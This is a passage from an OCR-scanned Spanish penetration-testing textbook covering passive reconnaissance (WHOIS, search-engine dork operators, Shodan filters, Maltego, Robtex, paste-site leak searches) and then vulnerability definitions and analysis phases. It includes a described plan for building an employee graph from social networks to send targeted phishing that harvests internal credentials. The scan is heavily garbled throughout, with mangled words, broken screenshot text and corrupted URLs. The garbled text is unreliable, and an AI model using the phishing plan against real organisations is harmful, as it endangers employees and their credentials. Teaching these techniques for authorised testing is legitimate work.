Tech  Name. i. .  VSWM  DNS  Administration 

T  ed  i  Ad  dr  ess . . .  ■ , .... 

Tech  Address — .... 

Tedh  Adctess, . .  Redmond 

Tech  Address  W&til 

T«h  Address . . WA 

Tech  Address.,.; . united  states 

Tech  Email . .  nitadwin®*- 

Tech  Phone*,,.., . .  MO 

Tech  Fax,  +1.4  *85 

Name  Server .  P  ^  f  «■  iin  G7W-WE2T  pH  COM 

Name  Server . ...  GTM EAST  COM 


Imagen  02.27:  Ejemplo  de  tes  resuliados  de  WHOIS. 


la  imagen  a  mode  de  ejemplificar  la  informaeinn  que  puede  ser  obienida  a  traves  de  una 
consults  web.  Como  dato  mas  interesante  podria  considerarse  las  direcciones  de  eorreo  ya  que 
ofreeen  mlorm  acton  sabre  dos  de  los  dam  ini  os  usados  para  el  envio  y  la  reception  de  eorreo  s, 
ademds  en  determinadas  ocasiones  tambton  puede  ser  interesante  los  ntimeros  de  telefono  para 
posieriores  ataques  de  ingenieria  social  o  las  fee  has,  estas  ultimas  permit  irian  por  un  lado  ser 
capaces  de  suplantar  la  identidad  de!  sitio  web  si  el  admin  istrador  o  respousable  se  olvida  de  renova r 
d  contrato  y  por  otro,  mas  interesante  desde  el  punlo  de  vista  de  la  defensa,  los  registros  de  paginas 
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web  reeienles  y/o  de  corta  duracion,  para  ser  consideradas  como  posibles  paginas  de  spam  y  rastrear 
al  responsable  de  dicho  registro  para  comprobar  si  hay  m£s  paginas  stnii lares  registradas  al  mismo 
nomh  re. 


Otro  aspecto  interesante  de  esta  tecnica  de  deseubriniiento  pasivo  consisle  en  el  Whois  Historical 
disponible  de  manera  gratuita  a  traves  de  paginas  como  whoJs/whois>w$  o  de  pago  a  traves  de 
ciommntaol$> com  (aparentemente  presenta  mas  mformacion)  que  permite  realizar  un  seguimiemode 
aspectos  como  las  distintas  d  tree  clones  IP  que  ha  utilizado  el  domino. 


Google/Bing  Hacking 

Una  de  las  herramientas  pasivas  de  reconocimiento  web  y  busqueda  de  sitios  web  vulnerable!*  mas 
interesantes  eonsiste  en  el  uso  de  los  buscadores  Bing  y  Google  mediante  el  uso  de  busquedas 
avanzadas.  Lsta  modalidad  permite  deiinir  eriterios  como  el  lipo  de  pagina  web  a  buscar  scgun  so 
extension,  que  eontenga  cierto  segmento  de  texto  en  el  litulo,  que  en  el  cuerpo  de  la  pfigina  web 
aparezca  tal  texto,  que  la  busqueda  se  restringa  a  un  determinado  dominio  o  por  el  contrario  ignore 
todas  las  paginas  web  de  un  cierto  grupo  de  dam  ini  os,  etcetera. 

I  I  uso  de  las  busquedas  avanzadas  como  herraraienta  para  ios  fines  que  aqui  coneieme  es  1o  que 
se  denomma  Google  l lacking  y  Bing  Hacking  respect ivameme  v  es  umt  de  las  tunicas  usadas  por 
prog  ram  as  como  Maltego. 

Johnny  Long >  aprovec  ban  dose  dc  las  capacidades  de  Google ,  cred  una  base  de  dates  de  busquedas 
avanzadas  conocida  eon  el  nombre  de  "Google  Hacking  Database  \  la  pagina  web  original  se 
encuentra  desactualizada,  pero  cl  proyecto  continiia  adelante  en  la  web  dc  Exploit  Database  en  la 
seccion  de  Google  Dorks  (aetualmente  la  tercera  pest  an  a  bajo  la  abreviatura  de  GHDB). 


I  in  a  gen  02.2  S:  Pagina  vveb  de  exploit  database. 

Los  operadores  utilizados  para  tal  fin  son  los  siguientes: 
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-  site:  En  la  imroduccion  se  ha  heeho  referenda  a  este  operadon  cs  el  encargado  ik  resiringir 
las  Wisquedas  a  un  determ inado  dominie. 


-  Ip:  Solo  disponible  en  Bing,  Busea  ias  paginas  web  que  se  encuentren  en  la  direction  IP 
espeeificada, 


inurUallimui:  Realiza  la  biisqueda  contemplando  aquellas  paginas  web  en  euya  direction 
URL  aparezean  los  term  i  nos  espeeificados. 


-  imitle/allintitle:  Del  mismo  modo  que  el  anterior  restringe  el  ambito  de  la  busqueda  a  las 
paginas  web  que  contemplen  las  palabras  especificadas  en  el  titulo. 


-  link:  Este  operador  busea  paginas  que  enlazan  a  la  pagina  introducida  a  continuation. 

-  ext:  Busea  fas  direcdones  URL  cuyos  archives  acahen  en  la  extension  espeeificada, 

-  filetype:  En  Google  tiene  el  mismo  comportamiento  que  ext .  sin  embargo  en  Bing  permite 
buscar  por  el  tipo  de  fiehero  mdistintamente  de  la  extension  que  tenga, 

-  contains:  En  Bing  ofrece  3a  posibilidad  de  encontrar  paginas  eon  enlaces  a  ficheros  con 
una  determtnada  extension. 


intext:  At  contrario  que  los  otros  dorks  que  estan  disehados  para  buscar  information  on 
los  dementos  mas  auxi  bares  de  la  pagina  web,  este  argumento  obliga  a  buscar  el  raensaje 
dentro  del  euerpo  de  la  pagina  web* 

-  define:  Google  busea  en  las  paginas  donde  entiende  que  se  responds  a  la  definickm  de  la 
ffase  adjunta  al  dark 

-  info:  le  indica  a  Google  que  husque  information  sobre  la  frase  adj  un  la. 


Ad e m as  de  las  difereneias  inferidas,  entre  Google  y  Bing,  de  la  lectin  a  de  los  operadores  existen 
ufios  aspectos  a  destacar  como  son  ef  heeho  obvio  de  que  ambos  indexari  information  diferente, 
Bing  indexa  el  contenido  los  archives  comprimidos  o  empaquetados  y  el  nutnero  de  busquedas  a 
real  tzar  antes  de  que  salte  la  comprobacion  del  C  A  PTC  HA  parece  ser  superior  en  Bing. 


Shodan  Hacking 

Shndan  es  un  motor  de  bus  que  da  disefiado  para  buscar  dispositivos  y  sistemas  de  ordenadores 
coneetados  a  1  ntemet.  A  traves  de  esta  pagina  (ShodanHQ.com),  los  auditores  pueden  encontrar  gran 
varied  ad  de  dispositivos  coneetados  a  la  red,  como  pueden  ser  semaforos,  camaras  de  seguridad, 
cistern  as  de  calefaeeion  caseros,  sistemas  de  control  de  parques  acuaticos,  gasolineras,  centrales 
hidroelectricas,  etcetera*  Pueden  inctuso  encontrase  sistemas  de  control  de  centrales  nucleates  y  del 
acelerador  de  paniculas  cyclotron.  I  a  mayoria  tienen  seguridad  y  protection.  sin  embargo  tambien 
se  encueniran  muchos  dispositivos  con  credentials  por  defecto  que  pueden  ser  accedidos  desde  el 
propio  navegador. 

web  constantemente  busea  nuevos  dispositivos  accesibles  publicamente  desde 

internet  v  actual  iza  la  information  de  los  ya  existentes,  Esta  concentrado  en  sistemas  SC  A  DA. 

I  control  And  Data  icquisiiicion),  que  signihea  "‘Control  de  supervisidn  v  adquisicion 

de  dates1'. 
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La  bfisqueda  de  datos  se  enaicntra  liimtada  a  10  elementos  para  usuarios  anonimos,  50  elementos 
para  usuarios  registrados  y  10.000  elementos  para  aquellos  que  ban  pagado  la  subscripci6n,  Ademfc 
estos  ultimos  tienen  aceeso  a  una  serie  de  caracteristicas  como  el  uso  de  una  API  sin  restncciones 
puntuaies  y  consults  a  traves  de  Telnet  y  HTTPS.  i 


Al  igual  que  Google  y  Shodan  tambien  soporta  tile ros  para  realizar  hiisquedas  a\ anzadas.  Los 
filtros  basicos  soportados  son  los  siguientes: 

city:  permite  especifiear  la  ciudad, 

-  country:  permite  especifiear  las  iniciales  del  pats. 

geo:  permite  especifiear  las  coordenadas  geografieas  a  parti r  de  I  os  dates  dc  laiitud  y 
longitud,  adicionalmente  soporta  la  adicidn  de  un  tercer  parametro  que  especifique  el  numero 
de  kilometres  alrededor  del  punto,  por  defecio  5* 


-  hostname:  permite  especifiear  el  nombre  del  host. 


-  net:  permite  especifiear  la  direceion  IP  del  hast. 

-  os:  permite  especifiear  el  sistema  operative  del  host. 

-  port:  permite  especifiear  un  puerto  en  concreto  de  los  33  que  soporta.  (En  la  web  Shodan 
es  posibie  encontrar  ayuda  sobre  los  filtros  para  obtencr  mas  intormacion  acerca  dc  cuales 

son  esos  puerlos).  1 

.  before/after:  permite  especifiear  un  range  de  fechas  de  recoleccion  de  la  inl'ormaciou 
entre  los  que  acotar  la  busqueda. 


—  VIDEO  WEB  SERVER  — 

BHLmi  ' 

Added  ott  OS  04  201  3 

Marietta 


1  7'3-iSO-&B-S- 

at! ante  tifc.cDmeaaibusmass.net 


HTTP  1.0  200  OK 

Consist  item  clt»e 
Cacha-CD-Btrct'  fKXV&a 
Serrfcr:  SQ-TMBC.Uil 
CONTENT-!.  ENGTH:2  93  6 


Vit&sNa  District 

Addc*  or  08  04  2013 


Sofia 


HTTP' 1.0  200  OK 
Cofin*cticm  close 

ttO'Casha 

Serai  S^WtSCAM 
CONTENT  -LENGTH:434 


—  VIDEO  WEB  SERVER 


St-,  foy-te' 


■'.-■P'Wflfliftfl'ii'  &ervi«» 

Added  on  Q«  04  2015 

f  1  San  Ban*ti*tto  Q#E  tnjnto 


HTTP  1.0  200  OK 
Connection  ckn* 

CkH* -Control:  ncM-ach# 
Server:  S Q- WEBCAM 
CONTENTLENGTH :  2  93  & 


Imogen  02.29:  Ejcmplo  de  los  resultados  dc  ShodanHQ. 
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\  -na  vez  estudiado  el  fun  cion  amiento  de  Maltego  se  puede  apreeiar  el  poteneial  de  la  herramiemu 
para  la  fase  de  footprinting.  Uno  no  puede  evitar  pensar  en  las  alias  capacidades  y  como  seria  si  la 
propia  herramiema  fuese  compatible  con  nmap,  ShodanHQ y,  en  general,  con  el  resto  de  herramientas 
utilizadas  en  el  proceso  de  auditoria. 

Maltego  incorpora  la  opcion  dc  afiadir  nuevas  transformadas,  esto  sc  puede  hacer  de  tres  formas 
distintas,  bien  actualizando  desde  el  servidor  oficial,  bien  anadiendo  nuevos  repositories  o  bien 
desarrollando  transformadas  y  agregandolas  de  manera  local. 

El  caso  de  ShodanHQ  serf  a  la  segunda  de  las  formas  anteriores,  ShodanHQ  posee  una  API  para 
interactuar  con  la  pagina  web  desde  herramientas  desarrolladas  por  tereeros.  Para  ello  tan  solo  es 
necesario  estar  registrado  y  obtener,  de  manera  totalmente  gratuita,  el  hash  identificador  de  usnario 
necesario  para  su  funcionamiento.  En  la  direction  URL  httpH/maltego.shodanhqxom/ se  muestra  el 
procedimiento  a  seguir,  el  eual  consiste  basicamente  en  afiadir  un  nuevo  repositorio,  sincronizarlo  y 
descargarse  las  nuevas  transformadas. 

Para  nniap,  en  concrete,  y  para  el  resto  de  herramientas  de  script  en  general,  tambien  existe  la 
posibilidad  medfamte  transformadas  locales.  B  use  an  do  on  internet  es  postble  obtener  acceso  a  un 
post  de  un  foro  del  afio  2009  en  el  que  muestran  el  procedimiento  a  seguir,  pero  parece  ser  que 
responde  a  versiones  anteriores  del  programs,  No  obstante,  siempre  queda  la  posibdidad  dc  aprender 
cl  ]micionamiento  del  dcsarrollo  de  las  transformadas  y  programarse  manualmente  la  integracidn  de 
las  herramientas  anteriormente  mencionadas, 


Robtex 

La  pagina  web  Robtex  esta  eonsiderada  como  "La  Navaja  Suiza  de  Internet’*.  Esta  pagina  web 
permite  realizar  ciertas  partes  del  procedimiento  active  de  foolprinting  de  manera  pasiva,  es  deem 
en  lugar  de  preguntar  directamente  a  los  servidores  la  informacion  sobre  sus  dominies,  subdominios, 
servidores  DNS,  etcetera,  permite  obtener  dicha  informacion  sin  dejar  rastro  en  el  objetivo  a  traves 
de  una  sencilla  consults  web. 


Dale 

Jfii'Mmabttfv 

Apr  10.  2£l13  11  AlVf  ! 

.  a--.-,  ana  otr-ef  a»ii 

feax 

Apr  id,  3013  T 1  43  59  AM  j 

Sijdiliiiinm 

R#PL‘Ul»6r 

»- 

Apf  1  a  20 1 3  1  12  AM 

YtiifJ*  OHS  Ir.iJffTiHi  n;j 

Tot*(  *ccre  50. 50  rw^mpliz*^  iq  g  {j^  q|F  g.  baud  9  last 


★  ★★★★ 


Ctieck 


MS  on  alHfcsftrrt  tP  nwlwpda 


MS  delegaijcr.  ocmsistsm  rtrittr 


L  sr&j  m  OMQZ 


Luted  In  Akr.i*  l&e  10000C 


Good  WOT  rating 


in  Googl* 


YES 


YES 


YES 


YES 


VES 


Imagen  (J2,30:  Ejcmpfo  dc  result  ados  obtenidos  con  Robtv.v. 


|  A  I  ^ 

)  como  se  puede  apreeiar  en  la  i  magen,  la  respuesta  obtenida  muestra  enlaces  a  otras  paginas  de 
Wernet  como  Alexa ,  rbts.otg,  WOT \  informacion  de  los  servidores  DNS,  etcetera. 
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Information  Leakage 

En  internet  existen  siiios  web  que  podrlan  ser  eonsiderados  eomo  especial mente  diseflados  para 
las  ftigas  de  informacion,  un  ejemplo  de  cstos  sitios  son  Anon  Paste,  Pastebin,  PasfeHTML,  Pas  tie, 
etcetera.  Tam bi tin  se  pueden  encontrar  otras  webs  pensadas  para  alojar  cddigo  fiiente  de  desarrollos 
de  libre  acceso  eomo  Git  huh  o  Google  Code, 

Una  de  las  herramientas  utilizadas  para  recoleetar  inlormacion  es  Pastenum,  por  desgracia  en  el 
memento  de  escribir  este  capitulo  no  se  encuentra  disponible  en  Kali  aunque  eomo  todas  estas 
herramientas  su  procedi  mi ento  de  instalacion  es  bastanie  sencillo,  ha  side  desarrollada  pnr  el  equipo 
de  “Corel an  Team”* 

AI  margen  de  la  herramienta  mencionada,  huscar  en  estos  "Tepositorios”  se  puede  resum ir  en 
haeer  una  busqueda  desde  Google  o  Bing  restringiendo  el  ambito  de  la  busqueda  a  los  sitios 
web  anteriormentc  mendonados,  ademas  realizar  dicho  procedim lento  permite  en  muchos  casos 
sallarse  los  filtros  de  paginas  eomo  pastebin  que  al  recibir  una  denuncia  de  11110  de  sus  documentos 
unicamente  lo  eliminan  del  resultadn  de  la  busqueda  in  situ. 


Social  Network  Engineering 

]  loy  en  dia,  eon  el  augc  de  las  redes  sociales  para  todo  tipo  de  ambitos,  ocio*  profesionah  deporte, 
etcetera,  muchas  cm  pres  as  tienen  expuesto  en  internet  sin  saberlo,  o  al  menus  sin  entender  las 
impHcadones  que  ello  conlleva,  datos  privados  de  sus  trabaj adores. 

Por  ejemplo,  en  Facehook  a  t raves  del  correo  electrdnico  de  la  persona  se  pnede  acceder  a  su  peril  I. 
Tanto  en  Facehook  eomo  en  Twitter  los  datos  de  los  contactos  de  un  determinado  usuario  son  casi 
siempre  publicos,  en  Linkedin  se  puede  encontrar  el  cumculo  de  una  persona  asi  eomo  tambien  se 
puede  consultar  su  grupo  de  contactos.  Todo  ello  lleva  a  que  sin  ser  eonsciente  de  ello  se  pueda 
preguntar  en  Linkedin  por  ‘Todos”  los  empleados  de  una  empresa,  obtener  sus  contactos,  recurrir  a 
Facehook  y  a  Twitter  para  obtener  sus  ‘pensamientos  en  voz  alta"  y  parte  de  sus  contactos  dando 
eomo  resultado  un  mas  que  jugoso  grafo  de  los  empleados  de  ta  empress  y  las  relacioncs  entre  los 
mismos. 


A  partir  de  dicho  grafo,  y  con  un  poco  de  la  ayuda  de  Matte  go  y  similares,  es  posible  inferir  un  listado 
de  gran  pane  de  los  empleados  de  la  empresa  y  preparar  un  ataque  de  spam  altamente  dirigido  y 
segmentado,  de  manera  que  se  pod  da  haeer  enviar  un  correo  a  un  grupo  de  empleados  utilizando  la 
Ibrma  de  hablar  de  un  empleado  ajeno  al  grupo  que  sea  contacto/amigo  de  todos  el  los  solicitandole 
que  acceda,  por  ejemplo,  a  una  pagina  en  desarrollo  de  la  propia  empresa  y  que  se  identiflquen 
con  sus  eredenciales  intemos,  todo  ello  usando  siempre  recursos  propios  de  la  compafiia  v  en  una 
direction  URL  que  sea  altamente  confimdible. 


Para  ilustrar  el  ejemplo  anterior,  supongase  una  empresa  X,  si  se  realiza  una  busqueda  de  diclia 
empresa  en  Linkedin  con  un  usuario  con  privileges  basicos  la  inform  ad  on  obtenida  sera  similar  a 
la  sigmente: 
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Una  vez  se  obtiene  el  lislado  de  empleados  tan  “solo”  serfa  necesario  buscar  por  el  nombre  de 
eada  uno  de  los  empleados  tanto  en  Twitter  como  en  Facebook  buscando  el  nombre  de  la  empresa 
en  los  perfiles  y  a  partir  de  esc  punto  seria  posible  obtener  no  solo  dates  como  por  ejemplo  donde 
viven  los  empleados,  la  1'echa  de  nacimiento,  sus  gustos,  sus  opiniones,  sus  amigos,  donde  pasan  las 
vacaciones,  etcetera  sino  ademas  averiguar  datos  de  otros  empleados  que  si  bien  no  tienen  perfil  en 
Linkedin  si  que  tienen  un  perfil  en  una  de  las  otras  redes  sac  Sa  les  compart ido  casi  en  exclusiva  con 
otros  trabaj adores  de  la  misma  empresa. 

En  base  a  lo  anterior,  y  siendo  susceptible  de  anadir  mas  redes  sociales  a  la  ecuacion  junto  con  el  uso 
de  las  demas  tecnicas  de  footpnnting,  queda  patente  las  posibilidades  que  conlleva  paraun  atacante/ 
peniesterimutitQT  planificar  un  ataque  dirigido  que  ponga  en  jaque  a  una  determ inada  organ izac ion. 
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Capitulo  III 

Analisis  de  Vulnerabilidades  y  ataques  de 

contraseiias 


1.  Vulnerabilidad 

St  se  busca  ia  definition  a  las  palabras  "Vulnerabilidad”  y  "seguridad”  es  posible  alcanzar  una 
compresion  razonable  sobre  cuai  puede  ser  el  significado  de  una  "Vulnerabilidad  de  seguridad",  De 
esta  manera,  es  posible  llegar  a  La  conclusion  de  que  una  vulnerabilidad  de  seguridad  es  aquello  que 
ofreec  un  posible  vector  de  ataque  conira  un  sistema,  mcluyendo  aspectos  come  el  malware ,  sistemas 
mat  con  configurados,  contraseiias  escritas  en  cualquier  parte,  etcetera.  Gbviamente  aspectos  como 
estos  aumentan  el  riesgo  de  un  determinado  sistema.  Sin  embargo,  esta  definicion  no  es  suficiente, 
tu]  y  como  sefiala  Microsoft  en  uno  de  los  articulos  de  la  libreria  Tech  Net.  resulta  necesario  exponer 
una  definition  algo  mas  amplia  a  la  utilizadu  generalmente  en  La  comunidad  de  seguridad. 

Una  definition  mas  correcta  de  vulnerabilidad  seria  la  siguiente: 

bita  \'f  unerahilidad  de  seguridad  es  una  dehilidad  en  un  producto  que  podria  permitir  a  un  usuario 
mulmtencionado  comprometer  la  integridad,  disponibilidad,  o  canfidencialidad  de  dicho  producto  N 


Una  vez  expuesta  la  definicion  resulta  necesario  analizar  el  significado  exacto  de  la  rmsma.  A 
continuacidn  se  van  a  exponer  cada  una  de  las  section  es  de  la  definicion  y  se  aclarara  mediante 
ejeniplos  que  permitan  entender  la  forma  en  Ia  que  esta  definicion  es  apiicada  a  la  vida  real. 

-  Dehilidad:  Las  vulnerabilidades  de  seguridad  implican  la  explolacion  de  debiltdades 
accidentales,  cstas  debilidades  generalmente  aparecen  por  deficiencias  en  el  disefio  del 

producto.  Sin  embargo,  estas  deficiencias  no  siempre  acaban  desencadenando  vu  Inerabilidades 
de  seguridad. 

Ljemplos;  La  election  de  implementar  un  cifimdo  de  40-bit  en  un  producto  no  constituma 
una  vulnerabilidad  de  seguridad,  a  pesar  de  que  la  protection  que  proporctone  sea  inadccuada 
para  segun  que  propositus.  I  n  contrasts,  un  error  de  implementation  que  inadvertidamente 
cause  un  ci  trado  de  256-bit  que  descarte  la  mitad  de  I  os  bits  en  La  clave  si  supondria  una 
vulnerabilidad  de  seguridad. 
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Produeto:  Las  vulnerabilidades  de  seguridad  son  el  resultado  de  un  problema  de  un 
produeto.  Los  problemas  que  sc  derivan  dc  la  adhesion  de  normas  imperfectas  pero  de  amplia 
aeeptaeidn  no  constituyen  vulnerabilidades  de  seguridad. 

Ejemplos:  Un  navegador  que,  a)  conectarse  a  un  sitio  FTP.  inieializa  la  sesion  enviando 
las  credenciales  “en  claro^  no  se  considera  que  tenga  un  problema  de  seguridad,  ya  que  la 
espeeificacion  FTP  establece  que  se  inicialicen  las  sesiones  en  texto  piano*  Sin  embargo,  si 
el  navegador  lleva  a  eabo  sesiones  SSL  en  texto  piano,  si  constituiria  una  vulnerabilidad  de 
seguridad,  ya  que  la  espeeificacion  de  SSL  indica  que  esta  debe  tener  las  sesiones  cifradas. 

-  Integridad;  La  integridad  hace  referenda  a  la  fiahilidad  de  un  recurso,  Un  usuario 
malinteneionado  que  explota  una  debilidad  en  un  product©  para  modificarlo  silendosamente 
y  sin  autorizacion  esta  comprometiendo  la  integridad  del  produeto. 

Ejemplos:  Una  debilidad  que  permits  a  un  administrador  cambiar  los  pertnisos  de  cualquicr 
archive  no  supondria  un  problema  de  seguridad  puesto  que  un  administrador  ya  posee  dieha 
capacidad.  For  el  contrario,  si  una  debilidad  permitiese  a  un  usuario  sin  privilegios  llevar  a 
cabo  la  misma  ace  ion,  esto  si  constituiria  una  vulnerabilidad  de  seguridad. 

-  Diisponibilidad:  La  disponibilidad  se  refiere  a  la  posibilidad  de  acceder  a  un  recurso.  Un 
usuario  malinteneionado  que  explota  una  debilidad  en  un  produeto,  negando  el  acceso  de  un 
usuario  a  die  ho  produeto,  esta  comprometiendo  la  disponibilidad  del  mismo. 

Ejemplos:  Una  debilidad  que  permite  a  un  ataeante  provoear  lacaida  de  un  servj  dor  constituiria 
una  vulnerabilidad  de  seguridad,  puesto  que  el  atacanie  seria  capaz  de  regular  si  el  servidor 
es  capaz  de  pro  veer  servicios  o  no.  Sin  embargo,  el  hecho  de  que  un  atacante  pueda  enviar  un 
gran  numero  de  peticiones  legitimas  a  un  servidor  y  monopolizar  los  recursos  no  constituiria 
una  vulnerabilidad  de  seguridad,  siempre  y  cuando  el  operador  del  servidor  sea  eapaz  de 
controlar  el  sistema. 

-  Confidencialidad:  La  confidencialidad  liace  referencia  a  la  limitaeion  del  acceso  a  la 
informacion  de  un  recurso  exclusivamente  a  las  personas  autorizadas.  Un  atacante  que  explota 
una  debilidad  en  un  produeto  para  acceder  a  la  informacion  no  pubiica  comprometeria  la 
confidencialidad  de  ese  produeto, 

Ejemplos:  Una  debilidad  en  un  sitio  web  que  permite  a  un  visitante  leer  un  archive  que  no 
deberia  poder  leerse  constituiria  una  vulnerabilidad  de  seguridad.  Sin  embargo,  una  debilidad 
que  revel e  la  ubicacion  fisica  de  un  archivo  no  constituye  una  vulnerabilidad.  Esle  hecho 
podria  ser  util  para  fines  de  reconocimiento,  y  se  podria  utilizar  junto  con  una  vulnerabilidad 
de  mgenieria  social  para  comprometer  los  archivos.  For  tanto  por  si  sola  no  permiliria  a  un 
atacante  comprometer  tos  datos,  y  no  constituiria  una  vulnerabilidad  de  seguridad. 

Como  puede  verse,  la  integridad,  la  disponibilidad  y  la  confidencialidad  son  los  ires  objetivos 
principles  de  la  seguridad*  Si  se  carecede  unoo  mas  de  estos  tres  elementos,existe  una  vulnerabilidad 
de  seguridad,  y  podrian  quedar  comproinetidos  uno  o  varies  de  estos  elementos  al  mismo  tiempo. 
Por  ejemplo,  una  vulnerabilidad  de  fuga  de  informacion  podria  comprometer  la  confidencialidad  de 
un  produeto,  mientras  que  una  vulnerabilidad  de  ejeeueidn  dc  eodigo  remoto  podria  comprometer 
su  integridad,  su  disponibilidad  y  su  confidencialidad. 
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2.  Analisis  de  vulnerabilidades 

I  n  este  apartado  se  presentan  los  aspcctos  principales  que  un  analisis  de  vlj  Inerabilidades  debe 
k  nhnr.  Obviamenie,  esto  depen dera  de  fases  previas  como  la  fase  de  reeogida  de  informacion. 

A  continuacion  se  presentan  unas  imagenc*  rdaeionadas,  que  representa  las  ramas  principals,  tal  y 
como  son  definidas  por  el  Penetration  Testing  Execution  Estamhu\  que  constituyen  el  esquema  de 

esta  lase: 

Pmebas 

/ 

Analisis  de  w  1-.  ^ 

L  Vulnefsbilidsdes 

-  \  :  — - ; 

investigation 

Imogen  03.01:  Esquema  prmetpfi!  del  PTES  sobre  el  "Analisis  de  vulnerabilidades”. 


Imagert  03.02:  Ease  de  "Pruebas”  correspondienie  al  "Analisis  de  vulnerabilidades". 


so 


Pettiest  mg  con  Kali 


Imagcn  03. 04:  Fast?  dc  ‘  Investigation"  correspond ienle  al  “Amilisis  de  vulnerdbilidades” 


Pruebas 

1:1  analisis  de  vulnerabilidades,  tal  y  coino  se  ha  comeutado  en  la  definition,  es  el  proceso  de 
deseubrir  dehifidades  en  lus  si  stem  as  y  aplicackuies  que  puedan  ser  aprovechadas  par  un  atacante, 
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gstos  defectos  pueden  abarcar  desde  ima  mala  configuration  del  equipo  y  servicios  al  diseho  de 
aplicaciones  inseguras.  Aunque  cl  proeeso  a  seguir  para  buscar  los  defectos  varia  y  depende  en  gran 
medida  del  componente  particular  a  probar,  existen  aspectos  fundamentals  commies  al  proeeso, 

\|  realizar  cl  analisis  de  una  vnlnerabilidad  de  cualquier  fipo,  el  analista  debe  enfocar  corrcctamemc 
la  profundidad  y  la  amplitud  de  ias  pruebasdecaraacumplk  con  los  objetivosy/o  requisites  deseados. 
La  profundi  dad  incluye  aspectos  tales  como  la  validation  de  las  datos  de  entrada,  los  requisites  de 
autentication,  etcetera.  Sea  cual  sea  el  amtaito  de  aplicacion,  las  pruebas  deben  estar  adaptadas  para 
satisfaeer  los  requisites  de  profundidad  para  alcanzar  los  objetivos,  en  consecuencia,  la  profundidad 
de  las  pruebas  siempre  debe  ser  validada  para  asegurar  que  los  resultados  de  la  evaluation  satisf'agan 
las  expectativas,  Ademas  de  la  profundidad,  la  amplitud  tambien  debe  ser  tomada  en  consideration 
cuando  se  realizan  los  analisis  de  vulnerabilidades.  Por  su  parte,  la  amplitud  abarca  aspectos  tales 
como  las  redes  objetivo,  segmentos  de  red,  equipos,  inventarios,  etcetera. 

Por  ejemplo,  el  case  mas  sencillo  podria  consistir  en  encontrar  lodas  las  vulnerabilidades  en  un 
detenninado  equipo,  mientras  que  en  oiros  casos  mas  avanzados,  podria  consistir  en  encontrar  las 
vulnerabilidades  en  una  serie  de  equipos  que  cuinplan  una  determinada  condicidn.  Por  tanto,  la 
amplitud  siempre  debe  ser  comprobada para  asegurar  que  se  ha  cumplido  con  los  objetivos  y  que  no 
se  ha  dejado  ningun  equipo  sin  auditar, 

Activo 

Las  pruebas  aelivas  requieren  la  interaction  di recta  con  el  componente  a  auditar  en  busca  de 
vulnerabilidades  de  seguridad,  Esto  podria  implicar  componcntes  de  bajo  nivel,  tales  como  la  pi  la 
TCP  en  un  delerminado  dispositive  de  red,  o  componente®  de  mas  alto  nivel  como  una  interfaz  web 
para  la  administration  de!  mismo.  En  base  a  lo  anterior,  hay  dos  formas  distintas  de  imeractuar  con 
el  componente  de  destino:  automat izada  y  manual 

Automatizada 

Las  pruebas  automatizadas  se  basan  en  el  uso  de  software  encargado  de  escanear  los  servicios 
hacienda  determinadas  peticiones,  examinan  las  repuestas  y  determ i nan  la  postble  existencia  de  una 
vulnerabilidad.  Este  proeeso  automatizada  reduce  los  requisites  de  tiempo  y  costes  laborales,  pero 
siempre  sera  necesaria  la  comprobacion  por  parte  del  auditor  de  los  resultados  obtenidos, 

l^sias  herramientas  de  software  sc  clasilican  en  cuatro  categories  distintas: 

-  Escaneres  genericos  de  vulnerabilidades  de  red:  Este  tipo  de  escaneres  busean  identificar 
versiones  de  servicios  con  vulnerabilidades  eonoeidas,  Dentro  de  esta  categoria  se  eneuentran 
los  escaneres  de  puertos,  servicios  y  banners  ya  mencionados  en  el  capitulo  de  footprinting. 

-  Escaner  de  aplicaciones  web:  Dentro  de  esta  categoria  sc  eneuentran  principalmente 
dos  tipos  de  aplicaciones,  Por  un  I  ado,  aquellas  que  rastrean  todos  los  enlaces  del  servidor 
buscando  cualquier  postble  inyeccidn  o  mala  configuration.  Y  por  el  otro  lado  se  eneuentran 
aquellos  que  llevan  un  lisiado  de  directorios  y  archives  asoeiados  con  una  vulncrabilidad 
ccmocida.  En  este  sentido  hay  que  destacar  Burp  Suite  mediante  el  uso  del  Spider  y  el  Escaner 
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Activo ,  exdusivaraente  disponible  en  la  version  de  pago  y  la  herramienta  rnencionada  en  el 
capftulo  anterior,  Nikto, 

-  EscAner de  vulnerabilidades  de  red:  Dentro  dc  esta  eategoria  entra  el  anilisis  de  protocols 
como  el  VPN  y  el  IPv6.  Esto  se  debe  a  que  las  herramientas  de analisis  tradicionales  no  estan 
p  re  pa  rad  as  para  trabajar  con  estos  protocolos  y  sc  necesitan  herramientas  especial  izadas, 

Escaner  de  redes  de  voz:  Similar  a  la  eategoria  anterior  con  la  salvedad  de  que  este  tipo  de 
protocolos  se  utiliza  para  transportar  voz  y  se  necesitan  herramientas  disenadas  para  evaluar 
aspectos  como  la  posihilidad  de  eapturar  conversaciones  o  de  sup  lan  tar  llamadas  tele  Ion  icas, 


Concxion  Manual  Directa 

Como  en  cualquier  otro  proceso  automatizado  o  tecnologia,  el  margen  de  error  y/o  falsos  positivos 
siempre  esta  presente.  En  base  a  esto,  siempre  resulta  recomendable  hacer  comprobaciones  manuales 
para  validar  los  resultados  de  las  pruebas  automatizadas,  asi  como  ia  identificacidn  dc  todos  los 
posibles  vectores  de  ataque  y  los  puxilos  debiles  previamente  identificados. 


Ofuscado 

Giro  aspecto  a  loner  en  cuenta  a  la  hora  de  realizar  la  auditor  ia  es  la  posible  existencia  de  fi  Itros  IDS, 
IPS  y  WAR  Esto  implica  la  necesidad  de  evitar  un  eomportamiento  regular  y  predecible  por  parte 


de  las  herramientas  automatizadas  de  auditoria.  Por  ello  existen  diferentes  tecnicas  como  variar  los 
nodes  de  salida,  aliemar  entre  objetivos,  modificar  eiertos  campos  de  las  peticiones,  etcetera* 


Pasivo  1 

En  este  tipo  de  pruebas  entran  aqueilas  relacionadas  con  Ia  rccogida  pasiva  de  informacidn 
eomentada  en  el  capftulo  anterior,  con  la  salvedad  de  que  en  esta  fase  de  la  auditoria  no  se  busca 
enumerar  informacidn,  si  no  analizar  los  mismos  resultados  buscando  comportamientos  sospechosos 
o  informacion  confidencial  en  documentos  que  puedan  suponer  una  vulnerabilidad  en  el  sistema. 


Validacion 


Correlacion  entre  las  herramientas 

Cuando  se  trabaja  eon  varias  herramientas  surge  la  necesidad  de  correlacion  de  los  resultados,  tarea 
que  puede  He  gar  a  ser  complieada.  La  correlacion  de  los  elemenlos  puede  ser  llevada  a  cabo  de  dos 
